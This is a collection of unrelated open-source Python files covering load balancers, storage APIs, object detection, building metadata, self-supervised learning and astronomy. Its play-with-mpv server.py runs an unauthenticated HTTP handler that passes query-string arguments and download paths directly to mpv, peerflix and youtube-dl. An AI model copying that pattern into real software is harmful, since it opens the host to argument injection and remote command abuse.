>>> from haproxyadmin import haproxy
>>> hap = haproxy.HAProxy(socket_dir='/run/haproxy')
>>> frontend = hap.frontend('frontend2_proc34')
>>> frontend.status
'OPEN'
"""
results = cmd_across_all_procs(self._frontend_per_proc, 'metric',
'status')
return compare_values(results)
|
cinder/api/v3/views/attachments.py | lightsey/cinder | 571 | 11087095 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import timeutils
class ViewBuilder(object):
"""Model an attachment API response as a python dictionary."""
_collection_name = "attachments"
@staticmethod
def _normalize(date):
if date:
return timeutils.normalize_time(date)
return ''
@classmethod
def detail(cls, attachment, flat=False):
"""Detailed view of an attachment."""
result = cls.summary(attachment, flat=True)
result.update(
attached_at=cls._normalize(attachment.attach_time),
detached_at=cls._normalize(attachment.detach_time),
attach_mode=attachment.attach_mode,
connection_info=attachment.connection_info)
if flat:
return result
return {'attachment': result}
@staticmethod
def summary(attachment, flat=False):
"""Non detailed view of an attachment."""
result = {
'id': attachment.id,
'status': attachment.attach_status,
'instance': attachment.instance_uuid,
'volume_id': attachment.volume_id, }
if flat:
return result
return {'attachment': result}
@classmethod
def list(cls, attachments, detail=False):
"""Build a view of a list of attachments."""
func = cls.detail if detail else cls.summary
return {'attachments': [func(attachment, flat=True) for attachment in
attachments]}
|
server.py | ivaylo-iliev/play-with-mpv | 254 | 11087138 | #!/usr/bin/env python
# Plays MPV when instructed to by a chrome extension =]
import sys
from subprocess import Popen
from shutil import which
PORT = 7531
# Use --public if you want the server and extension on different computers
hostname = 'localhost'
if '--public' in sys.argv:
hostname = '0.0.0.0'
if sys.version_info[0] < 3: # python 2
import BaseHTTPServer
import urlparse
class CompatibilityMixin:
def send_body(self, msg):
self.wfile.write(msg+'\n')
self.wfile.close()
else: # python 3
import http.server as BaseHTTPServer
import urllib.parse as urlparse
class CompatibilityMixin:
def send_body(self, msg):
self.wfile.write(bytes(msg+'\n', 'utf-8'))
class Handler(BaseHTTPServer.BaseHTTPRequestHandler, CompatibilityMixin):
def respond(self, code, body=None):
self.send_response(code)
self.send_header("Content-type", "text/plain")
self.end_headers()
if body:
self.send_body(body)
def play_with_mpv(self, query):
mpv_command='mpv'
if "list" in query:
list_url = 'https://www.youtube.com/playlist?list={}'.format(
query["list"][0])
ytdl_format = ''
if "mpv_args" in query:
if query["mpv_args"] is not None:
ytdl_format = '--ytdl-format={}'.format(query["mpv_args"][0])
return Popen([mpv_command, list_url, '--force-window'] +
query.get("mpv_args", []))
else:
mpv_options = ''
urls = str(query["play_url"][0])
return Popen([mpv_command, urls, '--force-window'] +
query.get("mpv_args", []))
def play_with_celluloid(self, query):
if which('celluloid') is not None:
# Playlist support
urls = ''
if "list" in query:
urls += str("&list={}".format(query["list"][0]))
mpv_command = 'celluloid'
mpv_options = []
# Translate mpv options to celluloid
for mpv_arg in query["mpv_args"]:
if '--ytdl-format' in mpv_arg:
mpv_options.append(mpv_arg.replace(
'--ytdl-format=', '--mpv-ytdl-format="') + '"')
else:
mpv_options.append(mpv_arg)
return Popen([mpv_command, urls] + mpv_options)
def do_GET(self):
mpv_command='mpv'
try:
url = urlparse.urlparse(self.path)
query = urlparse.parse_qs(url.query)
except:
query = {}
if query.get('mpv_args'):
print("MPV ARGS:", query.get('mpv_args'))
mpv_command = 'mpv'
if('mpv_player' in query):
mpv_command = query['mpv_player'][0]
if "play_url" in query:
urls = str(query["play_url"][0])
if urls.startswith('magnet:') or urls.endswith('.torrent'):
pipe = Popen(['peerflix', '-k', urls, '--', '--force-window'] +
query.get("mpv_args", []))
else:
if mpv_command == 'mpv':
pipe = self.play_with_mpv(query)
elif mpv_command == 'celluloid':
pipe = self.play_with_celluloid(query)
self.respond(200, "playing...")
elif "cast_url" in query:
urls = str(query["cast_url"][0])
if urls.startswith('magnet:') or urls.endswith('.torrent'):
print(" === WARNING: Casting torrents not yet fully supported!")
with Popen(['mkchromecast', '--video',
'--source-url', 'http://localhost:8888']):
pass
pipe.terminate()
else:
pipe = Popen(['mkchromecast', '--video', '-y', urls])
self.respond(200, "casting...")
elif "fairuse_url" in query:
urls = str(query["fairuse_url"][0])
location = query.get("location", ['~/Downloads/'])[0]
if "%" not in location:
location += "%(title)s.%(ext)s"
print("downloading ", urls, "to", location)
if urls.startswith('magnet:') or urls.endswith('.torrent'):
msg = " === ERROR: Downloading torrents not yet supported!"
print(msg)
self.respond(400, msg)
else:
pipe = Popen(['youtube-dl', urls, '-o', location] +
query.get('ytdl_args', []))
self.respond(200, "downloading...")
else:
self.respond(400)
def start():
httpd = BaseHTTPServer.HTTPServer((hostname, PORT), Handler)
print("serving on {}:{}".format(hostname, PORT))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print(" shutting down...")
httpd.shutdown()
if __name__ == '__main__':
start()
|
platform/coredb/coredb/models/artifacts.py | admariner/polyaxon | 3,200 | 11087139 | <reponame>admariner/polyaxon<gh_stars>1000+
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from coredb.abstracts.artifacts import BaseArtifact, BaseArtifactLineage
class Artifact(BaseArtifact):
class Meta:
app_label = "coredb"
unique_together = (("name", "state"),)
db_table = "db_artifact"
class ArtifactLineage(BaseArtifactLineage):
class Meta:
app_label = "coredb"
unique_together = (("run", "artifact", "is_input"),)
db_table = "db_artifactlineage"
|
mlcomp/db/providers/dag_storage.py | sUeharaE4/mlcomp | 166 | 11087149 | <reponame>sUeharaE4/mlcomp<filename>mlcomp/db/providers/dag_storage.py<gh_stars>100-1000
from mlcomp.db.models import DagStorage, File, DagLibrary
from mlcomp.db.providers.base import BaseDataProvider
class DagStorageProvider(BaseDataProvider):
model = DagStorage
def by_dag(self, dag: int):
query = self.query(DagStorage, File).join(File, isouter=True). \
filter(DagStorage.dag == dag). \
order_by(DagStorage.path)
return query.all()
class DagLibraryProvider(BaseDataProvider):
model = DagLibrary
def dag(self, dag: int):
return self.query(DagLibrary.library, DagLibrary.version). \
filter(DagLibrary.dag == dag).all()
__all__ = ['DagStorageProvider', 'DagLibraryProvider']
|
transformer_courses/BERT_distillation/PaddleSlim-develop/paddleslim/common/rl_controller/__init__.py | wwhio/awesome-DeepLearning | 1,150 | 11087189 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from ..log_helper import get_logger
_logger = get_logger(__name__, level=logging.INFO)
try:
import parl
from .ddpg import *
except ImportError as e:
pass
from .lstm import *
from .utils import *
|
mmdet/models/dense_heads/obb/odm_head.py | voinSR/OBBDetection | 274 | 11087205 | import torch
from mmcv.cnn import ConvModule, normal_init, bias_init_with_prob
from mmdet.ops.orn import ORConv2d, RotationInvariantPooling
from torch import nn
from mmdet.core import get_bbox_dim, build_bbox_coder, build_assigner, build_sampler, build_anchor_generator, \
multi_apply, images_to_levels, force_fp32
from .obb_anchor_head import OBBAnchorHead
from mmdet.models.builder import HEADS, build_loss
@HEADS.register_module()
class ODMHead(OBBAnchorHead):
def __init__(self,
num_classes,
in_channels,
feat_channels=256,
stacked_convs=4,
with_orconv=False,
bbox_type='obb',
reg_dim=None,
anchor_generator=None,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=(.0, .0, .0, .0),
target_stds=(1.0, 1.0, 1.0, 1.0)),
reg_decoded_bbox=False,
background_label=None,
loss_cls=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
loss_weight=1.0),
loss_bbox=dict(
type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0),
conv_cfg=None,
norm_cfg=None,
train_cfg=None,
test_cfg=None):
super(OBBAnchorHead, self).__init__()
self.in_channels = in_channels
self.num_classes = num_classes
self.stacked_convs = stacked_convs
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.feat_channels = feat_channels
self.bbox_type = bbox_type
self.reg_dim = get_bbox_dim(self.bbox_type) \
if reg_dim is None else reg_dim
self.use_sigmoid_cls = loss_cls.get('use_sigmoid', False)
# TODO better way to determine whether sample or not
self.sampling = loss_cls['type'] not in [
'FocalLoss', 'GHMC', 'QualityFocalLoss'
]
if self.use_sigmoid_cls:
self.cls_out_channels = num_classes
else:
self.cls_out_channels = num_classes + 1
if self.cls_out_channels <= 0:
raise ValueError(f'num_classes={num_classes} is too small')
self.reg_decoded_bbox = reg_decoded_bbox
self.background_label = (
num_classes if background_label is None else background_label)
# background_label should be either 0 or num_classes
assert (self.background_label == 0
or self.background_label == num_classes)
self.bbox_coder = build_bbox_coder(bbox_coder)
self.loss_cls = build_loss(loss_cls)
self.loss_bbox = build_loss(loss_bbox)
self.train_cfg = train_cfg
self.test_cfg = test_cfg
if self.train_cfg:
self.assigner = build_assigner(self.train_cfg.assigner)
# use PseudoSampler when sampling is False
if self.sampling and hasattr(self.train_cfg, 'sampler'):
sampler_cfg = self.train_cfg.sampler
else:
sampler_cfg = dict(type='PseudoSampler')
self.sampler = build_sampler(sampler_cfg, context=self)
self.fp16_enabled = False
self.with_orconv = with_orconv
if anchor_generator is None:
# Will Pass By S2AHead
self.anchor_generator = None
self.num_anchors = 1
self.with_prior = True
else:
self.anchor_generator = build_anchor_generator(anchor_generator)
# usually the numbers of anchors for each level are the same
# except SSD detectors
self.num_anchors = self.anchor_generator.num_base_anchors[0]
self.with_prior = False
self._init_layers()
def _init_layers(self):
"""Initialize layers of the head."""
self.relu = nn.ReLU(inplace=True)
if self.with_orconv:
self.or_conv = ORConv2d(self.feat_channels, int(
self.feat_channels / 8), kernel_size=3, padding=1, arf_config=(1, 8))
self.or_pool = RotationInvariantPooling(256, 8)
self.reg_convs = nn.ModuleList()
self.cls_convs = nn.ModuleList()
for i in range(self.stacked_convs):
chn = int(self.feat_channels /
8) if i == 0 and self.with_orconv else self.feat_channels
self.reg_convs.append(
ConvModule(
self.feat_channels,
self.feat_channels,
3,
stride=1,
padding=1))
self.cls_convs.append(
ConvModule(
chn,
self.feat_channels,
3,
stride=1,
padding=1))
self.odm_cls = nn.Conv2d(
self.feat_channels, self.cls_out_channels, 3, padding=1)
self.odm_reg = nn.Conv2d(self.feat_channels, 5, 3, padding=1)
def init_weights(self):
"""Initialize weights of the head."""
if self.with_orconv:
normal_init(self.or_conv, std=0.01)
for m in self.cls_convs:
normal_init(m.conv, std=0.01)
for m in self.reg_convs:
normal_init(m.conv, std=0.01)
bias_cls = bias_init_with_prob(0.01)
normal_init(self.odm_cls, std=0.01, bias=bias_cls)
normal_init(self.odm_reg, std=0.01)
def forward_single(self, x):
"""Forward feature of a single scale level.
Args:
x (Tensor): Features of a single scale level.
Returns:
tuple:
cls_score (Tensor): Cls scores for a single scale level
the channels number is num_anchors * num_classes.
bbox_pred (Tensor): Box energies / deltas for a single scale
level, the channels number is num_anchors * 4.
"""
skip_cls = self.test_cfg.get('skip_cls', False)
if self.with_orconv:
x = self.or_conv(x)
# reg
reg_feat = x
for reg_conv in self.reg_convs:
reg_feat = reg_conv(reg_feat)
bbox_pred = self.odm_reg(reg_feat)
if self.training or not skip_cls:
if self.with_orconv:
cls_feat = self.or_pool(x)
else:
cls_feat = x
for cls_conv in self.cls_convs:
cls_feat = cls_conv(cls_feat)
cls_score = self.odm_cls(cls_feat)
else:
cls_score = None
return cls_score, bbox_pred
def get_prior_anchors(self,
featmap_sizes,
refine_anchors,
img_metas,
is_train=True,
device='cuda'):
num_levels = len(featmap_sizes)
refine_anchors_list = []
for img_id, img_meta in enumerate(img_metas):
mlvl_refine_anchors = []
for i in range(num_levels):
refine_anchor = refine_anchors[i][img_id].reshape(-1, 5)
mlvl_refine_anchors.append(refine_anchor)
refine_anchors_list.append(mlvl_refine_anchors)
valid_flag_list = []
if is_train:
for img_id, img_meta in enumerate(img_metas):
multi_level_flags = self.anchor_generator.valid_flags(
featmap_sizes, img_meta['pad_shape'], device)
valid_flag_list.append(multi_level_flags)
return refine_anchors_list, valid_flag_list
def loss(self,
cls_scores,
bbox_preds,
gt_obboxes,
gt_labels,
prior_anchors,
img_metas,
gt_bboxes_ignore=None):
if prior_anchors is None:
assert not self.with_prior
return super().loss(cls_scores, bbox_preds, gt_obboxes, gt_labels, img_metas, gt_bboxes_ignore)
else:
assert self.with_prior
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
assert len(featmap_sizes) == self.anchor_generator.num_levels
device = cls_scores[0].device
anchor_list, valid_flag_list = self.get_prior_anchors(
featmap_sizes, prior_anchors, img_metas, device=device)
label_channels = self.cls_out_channels if self.use_sigmoid_cls else 1
cls_reg_targets = self.get_targets(
anchor_list,
valid_flag_list,
gt_obboxes,
img_metas,
gt_bboxes_ignore_list=gt_bboxes_ignore,
gt_labels_list=gt_labels,
label_channels=label_channels)
if cls_reg_targets is None:
return None
(labels_list, label_weights_list, bbox_targets_list, bbox_weights_list,
num_total_pos, num_total_neg) = cls_reg_targets
num_total_samples = (
num_total_pos + num_total_neg if self.sampling else num_total_pos)
# anchor number of multi levels
num_level_anchors = [anchors.size(0) for anchors in anchor_list[0]]
# concat all level anchors and flags to a single tensor
concat_anchor_list = []
for i in range(len(anchor_list)):
concat_anchor_list.append(torch.cat(anchor_list[i]))
all_anchor_list = images_to_levels(concat_anchor_list,
num_level_anchors)
losses_cls, losses_bbox = multi_apply(
self.loss_single,
cls_scores,
bbox_preds,
all_anchor_list,
labels_list,
label_weights_list,
bbox_targets_list,
bbox_weights_list,
num_total_samples=num_total_samples)
return dict(loss_cls=losses_cls, loss_bbox=losses_bbox)
@force_fp32(apply_to=('cls_scores', 'bbox_preds'))
def get_bboxes(self,
cls_scores,
bbox_preds,
prior_anchors,
img_metas,
cfg=None,
rescale=False):
if prior_anchors is None:
assert not self.with_prior
return super(ODMHead, self).get_bboxes(cls_scores, bbox_preds, img_metas, cfg, rescale)
else:
assert self.with_prior
assert len(cls_scores) == len(bbox_preds)
num_levels = len(cls_scores)
device = cls_scores[0].device
featmap_sizes = [cls_scores[i].shape[-2:] for i in range(num_levels)]
refine_anchors = self.get_prior_anchors(
featmap_sizes, prior_anchors, img_metas, is_train=False, device=device)
mlvl_anchors = refine_anchors[0][0]
result_list = []
for img_id in range(len(img_metas)):
cls_score_list = [
cls_scores[i][img_id].detach() for i in range(num_levels)
]
bbox_pred_list = [
bbox_preds[i][img_id].detach() for i in range(num_levels)
]
img_shape = img_metas[img_id]['img_shape']
scale_factor = img_metas[img_id]['scale_factor']
proposals = self._get_bboxes_single(cls_score_list, bbox_pred_list,
mlvl_anchors, img_shape,
scale_factor, cfg, rescale)
result_list.append(proposals)
return result_list
|
examples/building_meter/generate.py | BrickSchema/brick | 146 | 11087244 | <reponame>BrickSchema/brick
import brickschema
from brickschema.namespaces import A, OWL, BRICK, UNIT
from rdflib import Namespace, Literal
# our entities will live in this namespace
BLDG = Namespace("urn:example#")
# create a graph for our model
g = brickschema.Graph()
g.bind("bldg", BLDG)
# define a building in a site
g.add((BLDG["mysite"], A, BRICK.Site))
g.add((BLDG["mybldg"], A, BRICK.Building))
g.add((BLDG["mysite"], BRICK.hasPart, BLDG["mybldg"]))
# add a full building meter to the building
g.add((BLDG["meter"], A, BRICK.Building_Electrical_Meter))
g.add((BLDG["mybldg"], BRICK.isLocationOf, BLDG["meter"]))
# add sensors to the meter...
# energy sensor
g.add((BLDG["building_energy_sensor"], A, BRICK.Energy_Sensor))
g.add((BLDG["building_energy_sensor"], BRICK.isPointOf, BLDG["meter"]))
g.add((BLDG["building_energy_sensor"], BRICK.hasUnit, UNIT["KiloW-HR"]))
timeseries_props = [
(BRICK.hasTimeseriesId, Literal("a7523b08-7bc7-4a9d-8e88-8c0cd8084be0"))
]
g.add((BLDG["building_energy_sensor"], BRICK.timeseries, timeseries_props))
# power sensor
g.add((BLDG["building_power_sensor"], A, BRICK.Electrical_Power_Sensor))
g.add((BLDG["building_power_sensor"], BRICK.isPointOf, BLDG["meter"]))
g.add((BLDG["building_power_sensor"], BRICK.hasUnit, UNIT["KiloW"]))
timeseries_props = [
(BRICK.hasTimeseriesId, Literal("fd64fbc8-0742-4e1e-8f88-e2cd8a3d78af"))
]
g.add((BLDG["building_power_sensor"], BRICK.timeseries, timeseries_props))
# peak demand sensor
g.add((BLDG["building_peak_demand"], A, BRICK.Peak_Power_Demand_Sensor))
g.add((BLDG["building_peak_demand"], BRICK.isPointOf, BLDG["meter"]))
g.add((BLDG["building_peak_demand"], BRICK.hasUnit, UNIT["KiloW"]))
other_props = [
(BRICK.aggregationFunction, Literal("max")),
(BRICK.aggregationWindow, Literal("RP1D")),
]
g.add((BLDG["building_peak_demand"], BRICK.aggregate, other_props))
timeseries_props = [
(BRICK.hasTimeseriesId, Literal("bcf9a85d-696c-446a-a2ac-97207ecfbc56"))
]
g.add((BLDG["building_peak_demand"], BRICK.timeseries, timeseries_props))
# save the file
g.serialize("building_meter.ttl", format="ttl")
|
analysis/extract_pattern/extract_topk_cluster.py | taokong/ibot | 327 | 11087252 | <gh_stars>100-1000
# Copyright (c) ByteDance, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import os
import math
import argparse
import torch.backends.cudnn as cudnn
import torch
import torch.distributed as dist
import numpy as np
import models
import utils
from PIL import ImageFile
from tqdm import tqdm
from torchvision import transforms
from torch.utils.data import DataLoader
from models.head import iBOTHead
from PIL import Image, ImageDraw
from loader import ImageFolderInstance
ImageFile.LOAD_TRUNCATED_IMAGES = True
def concat_all_gather(tensor):
"""
Performs all_gather operation on the provided tensors.
*** Warning ***: torch.distributed.all_gather has no gradient.
"""
tensors_gather = [torch.ones_like(tensor)
for _ in range(torch.distributed.get_world_size())]
torch.distributed.all_gather(tensors_gather, tensor, async_op=False)
output = torch.cat(tensors_gather, dim=0)
return output
def main():
parser = argparse.ArgumentParser("The first stage of BoostrapSelfSup")
parser.add_argument('--local_rank', default=-1, type=int, help='node rank for distributed parallel')
parser.add_argument('--arch', default='vit_small', type=str, choices=['vit_tiny', 'vit_small', 'vit_base',
'vit_large', 'swin_tiny','swin_small', 'swin_base', 'swin_large', 'resnet50', 'resnet101'], help='Architecture.')
parser.add_argument('--data_path', default='/path/to/imagenet/val/', type=str,
help='Please specify path to the ImageNet validation data.')
parser.add_argument("--pretrained_path", type=str, default="", help="the pretraining models")
parser.add_argument("--checkpoint_key", default="teacher", type=str, help="""Key to use in the checkpoint
(Default: teacher)""")
parser.add_argument("--save_path", type=str, default="", help="where to save the memory_bank")
parser.add_argument("--batch_size", type=int, default=32, help="batch size")
parser.add_argument("--patch_size", type=int, default=16, help="patch size")
parser.add_argument("--img_size", type=int, default=224, help="image size")
parser.add_argument("--patch_window", type=int, default=5, help="patch visualize window")
parser.add_argument("--out_dim", type=int, default=8192, help="out_dim")
parser.add_argument("--type", type=str, default='patch', choices=['cls', 'patch'], help="""wether to visualize
patterns on patch level or cls level.""")
parser.add_argument("--topk", type=int, default=196, help="topk")
parser.add_argument("--show_pics", type=int, default=100, help="show pics of topk cluster with most items")
parser.add_argument("--chunks", type=int, default=16, help="""Number of counting chunks. Set this larger (e.g., 128
for DINO w/ 65536 out dim) when the model output dimension is large to avoid memory overflow.""")
args = parser.parse_args()
pretrained_path = os.path.expanduser(args.pretrained_path)
save_path = os.path.expanduser(args.save_path)
batch_size = args.batch_size
dist.init_process_group(backend='nccl')
torch.cuda.set_device(args.local_rank)
network = models.__dict__[args.arch](
patch_size=args.patch_size,
return_all_tokens=True,
)
network = utils.MultiCropWrapper(network, iBOTHead(
network.embed_dim,
args.out_dim,
patch_out_dim=args.out_dim,
act='gelu',
shared_head=True,
))
network.cuda(args.local_rank)
try:
utils.restart_from_checkpoint(pretrained_path, **{args.checkpoint_key: network})
except:
network = torch.nn.parallel.DistributedDataParallel(network, device_ids=[args.local_rank])
utils.restart_from_checkpoint(pretrained_path, **{args.checkpoint_key: network})
cudnn.benchmark = True
augmentation = transforms.Compose([
transforms.Resize(args.img_size // 7 * 8),
transforms.CenterCrop(args.img_size),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
train_dataset = ImageFolderInstance(args.data_path, transform=augmentation)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=False, rank=args.local_rank)
n_train_points = len(train_dataset)
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, sampler=train_sampler, pin_memory=True, num_workers=10)
try:
data = torch.load(os.path.join(args.save_path, f'memory_{args.type}.pth'))
memory_bank = data['memory_bank']
num_per_cluster = data.get('num_per_cluster', None)
except:
memory_bank = None
num_per_cluster = None
network.eval()
train_sampler.set_epoch(0)
for data in tqdm(train_dataloader):
idx, img, _ = data
idx = idx.cuda(args.local_rank, non_blocking=True)
img = img.cuda(args.local_rank, non_blocking=True)
feature = network(img)[1].contiguous() if args.type == \
'patch' else network(img)[0].contiguous()
feature = concat_all_gather(feature).detach().cpu()
idx = concat_all_gather(idx)
if memory_bank is None:
print("Initializing memory_bank bank: {} points.".format(n_train_points))
memory_bank = torch.zeros(n_train_points, feature.size(1), 2) if \
args.type == 'patch' else torch.zeros(n_train_points, 2)
memory_bank = memory_bank.to("cpu").detach()
with torch.no_grad():
memory_bank[idx] = torch.stack(feature.max(-1), dim=-1)
torch.save(
{'memory_bank': memory_bank},
os.path.join(args.save_path, f'memory_{args.type}.pth'),
)
if num_per_cluster is None and args.local_rank == 0:
num_per_cluster = torch.Tensor([])
all_dim = torch.arange(args.out_dim).chunk(args.chunks)
for i in tqdm(all_dim):
mask = memory_bank[..., 1, None] == i.view(1, 1, -1)
num_per_cluster = torch.cat((num_per_cluster, mask.sum((0,1))))
torch.save(
{'memory_bank': memory_bank,
'num_per_cluster': num_per_cluster},
os.path.join(args.save_path, f'memory_{args.type}.pth'),
)
if args.local_rank == 0:
patterns = {}
for i in num_per_cluster.topk(args.show_pics)[1]:
mask = memory_bank[..., 1] == i
if args.type == 'patch':
values, spatial_id = (memory_bank[..., 0] * mask).max(-1)
values, instance_id = torch.topk(values, args.topk * 2)
spatial_id = spatial_id[instance_id]
npatch = args.img_size // args.patch_size
height_id = spatial_id // npatch
width_id = spatial_id % npatch
indices = torch.stack((instance_id, height_id, width_id), dim=-1)
else:
values, indices = torch.topk((memory_bank[..., 0] * mask), args.topk)
patterns[i.item()] = indices
augmentation = transforms.Compose([
transforms.Resize(args.img_size // 7 * 8),
transforms.CenterCrop(args.img_size),
])
train_dataset = ImageFolderInstance(args.data_path, transform=augmentation)
for nrank, (cluster, idxs) in enumerate(patterns.items()):
size = math.ceil(args.topk ** 0.5) # 6
unit = args.patch_size if args.type == 'patch' else args.img_size # 16/224
vis_unit = (unit * args.patch_window) if args.type == 'patch' else unit # 80/224
img = Image.new('RGB', (size * vis_unit, size * vis_unit))
i = 0
for idx in idxs.numpy():
if args.type == 'patch':
_, raw, _ = train_dataset[idx[0]]
data = raw.crop((
(idx[2] - args.patch_window // 2) * unit,
(idx[1] - args.patch_window // 2) * unit,
(idx[2] + args.patch_window // 2 + 1) * unit,
(idx[1] + args.patch_window // 2 + 1) * unit))
# filter too dark patch for visualization
hsv = np.array(data.convert('HSV'))
if hsv[..., -1].mean() <= 40:
continue
# draw highlight region
if args.patch_window > 1:
draw = ImageDraw.Draw(data, "RGBA")
draw.rectangle((
args.patch_window // 2 * unit,
args.patch_window // 2 * unit,
(args.patch_window // 2 + 1) * unit,
(args.patch_window // 2 + 1) * unit),
fill=(200, 100, 0, 127))
else:
_, data, _ = train_dataset[idx]
img.paste(data, (i % size * vis_unit, i // size * vis_unit))
i += 1
if i >= args.topk:
break
img.save(os.path.join(save_path, 'c{}_crank{}_cid{}_top{}.jpg'.format(args.type, nrank, cluster, args.topk)))
if __name__ == '__main__':
main() |
src/lightkurve/seismology/utils.py | jorgemarpa/lightkurve | 235 | 11087255 | """Generic classes and functions which aid the asteroseismology features."""
import numpy as np
import copy
from astropy import units as u
from astropy.units import Quantity
__all__ = ["SeismologyQuantity"]
class SeismologyQuantity(Quantity):
"""Holds an asteroseismic value including its unit, error, and estimation method.
Compared to a traditional AstroPy `~astropy.units.Quantity` object, this
class has the following extra attributes:
* name (e.g. 'deltanu' or 'radius');
* error (i.e. the uncertainty);
* method (e.g. specifying the asteroseismic scaling relation);
* diagnostics;
* diagnostics_plot_method.
"""
def __new__(
cls,
quantity,
name=None,
error=None,
method=None,
diagnostics=None,
diagnostics_plot_method=None,
):
# Note: Quantity is peculiar to sub-class because it inherits from numpy ndarray;
# see https://docs.astropy.org/en/stable/units/quantity.html#subclassing-quantity.
self = Quantity.__new__(cls, quantity.value)
self.__dict__ = quantity.__dict__
self.name = name
self.error = error
self.method = method
self.diagnostics = diagnostics
self.diagnostics_plot_method = diagnostics_plot_method
return self
def __repr__(self):
try:
return "{}: {} {} (method: {})".format(
self.name, "{:.2f}".format(self.value), self.unit.__str__(), self.method
)
except AttributeError: # Math operations appear to remove Seismic attributes for now
return super().__repr__()
def _repr_latex_(self):
try:
return "{}: {} {} (method: {})".format(
self.name,
"${:.2f}$".format(self.value),
self.unit._repr_latex_(),
self.method,
)
except AttributeError: # Math operations appear to remove Seismic attributes for now
return super()._repr_latex_()
def get_fwhm(periodogram, numax):
"""In a power spectrum of a solar-like oscillator, the power of the
modes of oscillation will appear in the shape of that looks
approximately Gaussian, for all basic purposes, also referred to as the
'mode envelope'. For a given numax (the central frequency of the mode
envelope), the expected Full Width Half Maximum of the envelope is known
as a function of numax for evolved Red Giant Branch stars as follows
(see Mosser et al 2010):
fwhm = 0.66 * numax^0.88 .
If the maximum frequency in the periodogram is less than 500 microhertz,
this function will default to the above equation under the assumption it
is dealing with an RGB star, which oscillate at lower frequencies.
If the maximum frequency is above 500 microhertz, the envelope is given
as a different function of numax (see Lund et al. 2017), as
fwhm = 0.25 * numax,
in which case the function assumes it is dealing with a main sequence
star, which oscillate at higher frequencies.
Parameters
----------
numax : float
The estimated position of the numax of the power spectrum. This
is used to calculated the region autocorrelated with itself.
Returns
-------
fwhm: float
The estimate full-width-half-maximum of the seismic mode envelope
"""
# Calculate the index FWHM for a given numax
if u.Quantity(periodogram.frequency[-1], u.microhertz) > u.Quantity(
500.0, u.microhertz
):
fwhm = 0.25 * numax
else:
fwhm = 0.66 * numax ** 0.88
return fwhm
def autocorrelate(periodogram, numax, window_width=25.0, frequency_spacing=None):
"""An autocorrelation function (ACF) for seismic mode envelopes.
We autocorrelate a region with a width of `window_width` (in microhertz)
around a central frequency `numax` (in microhertz). The window size is
determined based on the location of the nyquist frequency when
estimating numax, and based on the expected width of the mode envelope
of the asteroseismic oscillations when calculating deltanu. The section of
power being autocorrelated is first resclaed by subtracting its mean, so
that its noise is centered around zero. If this is not done, noise will
appear in the ACF as a function of 1/lag.
Parameters:
----------
numax : float
The estimated position of the numax of the power spectrum. This
is used to calculated the region autocorrelated with itself.
window_width : int or float
The width of the autocorrelation window around the central
frequency numax.
frequency_spacing : float
The frequency spacing of the periodogram. If none is passed, it
is calculated internally. This should never be set by the user.
Returns:
--------
acf : array-like
The autocorrelation power calculated for the given numax
"""
if frequency_spacing is None:
frequency_spacing = np.median(np.diff(periodogram.frequency.value))
spread = int(window_width / 2 / frequency_spacing) # Find the spread in indices
x = int(numax / frequency_spacing) # Find the index value of numax
x0 = int(
(periodogram.frequency[0].value / frequency_spacing)
) # Transform in case the index isn't from 0
xt = x - x0
p_sel = copy.deepcopy(
periodogram.power[xt - spread : xt + spread].value
) # Make the window selection
p_sel -= np.nanmean(p_sel) # Make it so that the selection has zero mean.
C = np.correlate(p_sel, p_sel, mode="full")[
len(p_sel) - 1 :
] # Correlated the resulting SNR space with itself
return C
|
tests/presets/test_datapackage.py | JoeStaines/goodtables-py | 243 | 11087268 | <filename>tests/presets/test_datapackage.py
# -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
from copy import deepcopy
from goodtables import validate
from goodtables.presets.datapackage import datapackage
# Validate
@pytest.mark.parametrize('dp_path', [
'data/datapackages/valid/datapackage.json',
'data/datapackages/valid.zip',
])
def test_validate_datapackage_valid(log, dp_path):
report = validate(dp_path)
assert log(report) == []
@pytest.mark.parametrize('dp_path', [
'data/datapackages/invalid/datapackage.json',
'data/datapackages/invalid.zip',
])
def test_validate_datapackage_invalid(log, dp_path):
report = validate(dp_path)
assert log(report) == [
(1, 3, None, 'blank-row'),
(2, 4, None, 'blank-row'),
]
# Validate (integrity)
DESCRIPTOR = {
'resources': [
{
'name': 'resource1',
'path': 'data/valid.csv',
'bytes': 30,
'hash': 'sha256:a1fd6c5ff3494f697874deeb07f69f8667e903dd94a7bc062dd57550cea26da8',
}
]
}
def test_check_file_integrity(log):
